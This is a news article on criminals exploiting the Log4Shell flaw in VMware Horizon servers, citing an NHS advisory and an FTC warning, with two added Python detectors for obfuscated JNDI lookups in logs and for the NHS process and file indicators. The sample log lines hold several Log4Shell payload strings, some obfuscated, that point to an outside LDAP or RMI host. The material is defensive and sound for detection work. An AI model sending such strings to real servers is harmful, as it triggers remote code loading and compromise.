Patch systems are vulnerable to critical Log4j flaws, UK and US officials warn.

Criminals are actively exploiting the critical Log4Shell vulnerability on servers running VMware Horizon in an attempt to install malware that gives them full control of the affected systems, the UK's publicly funded National Health Service (NHS) warns.

CVE-2021-44228 is one of the most serious vulnerabilities to come to light in recent years. It resides in Log4j, a Java logging library used by thousands, if not millions, of third-party websites and applications, which means the base of vulnerable systems is enormous. The vulnerability is also extremely easy to exploit: a single crafted string that the application happens to log is enough to make Log4j fetch and run attacker-supplied code. That lets attackers install web shells, which give them a command window for running commands on the hacked server with the privileges of the compromised service, which on many servers are elevated.

The remote code execution flaw in Log4j came to light in December, after exploit code was released before a patch was available. Malicious hackers quickly began exploiting CVE-2021-44228 to compromise sensitive systems.

The attacks, including those targeting VMware Horizon, have continued ever since.
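Because the attack string rides inside any field the application logs (a User-Agent header, a URL path, a login name), hunting for the literal `${jndi:ldap://` form that the NHS advisory quotes misses the obfuscated variants seen in the wild, which hide the `jndi` token behind other Log4j lookups or URL encoding. The following detector is an added example, written for this page rather than taken from the article, the NHS advisory or any vendor tool; the log lines it scans are constructed for illustration and do not come from any real server.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (illustration only, not captured traffic).
# Line 1 is benign; lines 2-5 carry a JNDI lookup in progressively more hidden forms.
SAMPLE_LINES = [
    '10.0.0.5 - - [15/Jan/2022:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Jan/2022:10:01:23 +0000] "GET /portal/ HTTP/1.1" 200 1532 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Jan/2022:10:01:24 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Jan/2022:10:01:25 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [15/Jan/2022:10:01:26 +0000] '
    '"GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Lookup forms that Log4j 2.x resolves before the JNDI lookup runs, which attackers
# use to split up the "jndi" token: ${lower:x}/${upper:x} and the ${name:-default} form.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
# What is left once the obfuscation is unwound: ${jndi:<scheme>:<target>}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}")


def normalize(text: str) -> str:
    """Undo URL encoding and the lookup-based obfuscations, innermost first."""
    for _ in range(3):  # double-encoded payloads exist; stop once decoding is stable
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        stripped = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        stripped = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), stripped)
        if stripped == text:
            return text.lower()
        text = stripped  # nested lookups resolve one layer per pass


def find_log4shell_lookups(lines):
    """Return one finding per JNDI lookup found in the given log lines."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        for scheme, target in _JNDI.findall(normalize(raw)):
            findings.append({"line": number, "scheme": scheme, "target": target.lstrip("/")})
    return findings


if __name__ == "__main__":
    for finding in find_log4shell_lookups(SAMPLE_LINES):
        print(f"line {finding['line']}: jndi via {finding['scheme']} -> {finding['target']}")
```

The normalization loop matters more than the final pattern: the second and third constructed lines contain no literal `jndi` substring at all, and the last one contains no `${`, yet all four attacks resolve to the same `${jndi:...}` form once decoded. Run it against the raw, unparsed request log rather than a field-split copy, since the payload can sit in any header or parameter the application logs.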

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within the affected networks,” UK National Health Service officials wrote. The advisory goes on to give guidance on specific steps affected organizations can take to mitigate the threat.

The main one is to install the update VMware has released for Horizon, its product for delivering virtualized desktops and applications on top of the company’s virtualization technology. NHS officials also listed signs that potentially affected organizations can look for to determine whether they have already been attacked.

The notice comes a day after the Federal Trade Commission warned consumer-facing companies to patch vulnerable systems or risk the fate of Equifax. In 2019, the credit reporting agency agreed to pay $575 million to settle FTC charges stemming from its failure to patch an equally serious vulnerability in a different piece of software, Apache Struts. When attackers exploited that vulnerability on Equifax’s network, they compromised the confidential information of 143 million people, making it one of the worst data breaches in history.

“The FTC intends to use all of its legal authority to prosecute companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j or similar known vulnerabilities in the future,” FTC officials said.

The NHS is at least the second organization to observe exploits targeting a VMware product. Last month, researchers reported that attackers were targeting systems running VMware vCenter to install the Conti ransomware.

The attacks on unpatched VMware Horizon servers go after an open source component bundled with the product.

“The attack is most likely initiated through a Log4Shell payload similar to ${jndi:ldap://},” the NHS advisory stated. “The attack exploits the Log4Shell vulnerability in the Apache Tomcat service that is built into VMware Horizon. This then launches the following PowerShell command, generated from ws_TomcatService.exe:”


After a few additional steps, attackers can install a web shell that maintains persistent communication with a server they control. Here is a representation of the attack:


The notice added:

Organizations should look for the following:

  • Evidence of ws_TomcatService.exe spawning abnormal processes
  • Any powershell.exe processes containing ‘VMBlastSG’ on the command line
  • File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is generally overwritten during updates and otherwise remains unchanged
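The three indicators above are easy to turn into a hunt over endpoint telemetry. The script below is an added example for this page, not code from the article, the NHS advisory or VMware: it applies each indicator to a list of process-creation and file-modification events of the kind a Sysmon or EDR export produces. The events are constructed for illustration, the PowerShell command line in them is a made-up stand-in for whatever the advisory observed (the page does not reproduce it), the allowlist of expected Tomcat children is a placeholder you would rebuild from a known-good Horizon server, and the install prefix of the Horizon directory is assumed.

```python
import hashlib

# Assumed baseline of child images ws_TomcatService.exe is allowed to spawn.
# Placeholder for the example: derive the real set from a known-good Connection Server.
EXPECTED_TOMCAT_CHILDREN = {"conhost.exe"}

# Path tail from the advisory; matching on the suffix avoids hard-coding the install drive.
ABSG_WORKER_SUFFIX = r"\vmware\vmware view\server\appblastgateway\lib\absg-worker.js"

# Constructed stand-in for the absg-worker.js shipped with the installed Horizon build.
# In practice, hash the file from a freshly patched, known-good host.
KNOWN_GOOD_ABSG = b"// absg-worker.js (constructed placeholder for the shipped file)\n"
KNOWN_GOOD_SHA256 = hashlib.sha256(KNOWN_GOOD_ABSG).hexdigest()

# Constructed sample telemetry (not real events); the install prefix is assumed.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "services.exe", "image": "ws_TomcatService.exe",
     "cmdline": "ws_TomcatService.exe"},
    {"type": "process", "parent": "ws_TomcatService.exe", "image": "conhost.exe",
     "cmdline": "conhost.exe 0x4"},
    {"type": "process", "parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -Command "Restart-Service VMBlastSG"'},   # made-up command line
    {"type": "process", "parent": "ws_TomcatService.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
    {"type": "file_modified",
     "path": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js",
     "content": KNOWN_GOOD_ABSG + b"require('child_process'); // constructed tampering marker\n"},
    {"type": "file_modified",  # legitimate update: file rewritten but matches the baseline
     "path": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js",
     "content": KNOWN_GOOD_ABSG},
    {"type": "file_modified",
     "path": r"C:\Program Files\VMware\VMware View\Server\appblastgateway\lib\other.js",
     "content": b"// unrelated file\n"},
]


def _basename(image: str) -> str:
    """Lower-cased file name of an image path, so comparisons ignore directory and case."""
    return image.rsplit("\\", 1)[-1].lower()


def hunt_horizon_indicators(events, known_good_sha256=KNOWN_GOOD_SHA256):
    """Apply the three NHS indicators to a list of events; return one finding per hit."""
    findings = []
    for index, event in enumerate(events):
        if event["type"] == "process":
            parent, image = _basename(event["parent"]), _basename(event["image"])
            # Indicator 1: the Tomcat service spawning anything outside its baseline.
            if parent == "ws_tomcatservice.exe" and image not in EXPECTED_TOMCAT_CHILDREN:
                findings.append({"indicator": 1, "event": index,
                                 "detail": f"ws_TomcatService.exe spawned {image}: {event['cmdline']}"})
            # Indicator 2: any PowerShell touching the VMBlastSG service by name.
            if image == "powershell.exe" and "vmblastsg" in event["cmdline"].lower():
                findings.append({"indicator": 2, "event": index,
                                 "detail": f"powershell.exe referenced VMBlastSG: {event['cmdline']}"})
        elif event["type"] == "file_modified":
            # Indicator 3: absg-worker.js changed to something other than the shipped file.
            if event["path"].lower().endswith(ABSG_WORKER_SUFFIX):
                digest = hashlib.sha256(event["content"]).hexdigest()
                if digest != known_good_sha256:
                    findings.append({"indicator": 3, "event": index,
                                     "detail": f"absg-worker.js sha256 {digest[:16]}... differs from baseline"})
    return findings


if __name__ == "__main__":
    for finding in hunt_horizon_indicators(SAMPLE_EVENTS):
        print(f"[indicator {finding['indicator']}] event {finding['event']}: {finding['detail']}")
```

Two design points follow from the advisory's own wording. Indicator 1 is an allowlist, not a blocklist, because the attacker chooses the child process; the only reliable question is whether the Tomcat service should be spawning anything at all. Indicator 3 compares against a hash of the shipped file rather than alerting on any write, because the advisory notes the file is legitimately overwritten during updates: after patching, re-hash the new file and update the baseline, otherwise every upgrade produces a false positive.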

On Friday, security firm Praetorian published a tool for identifying vulnerable systems at scale.
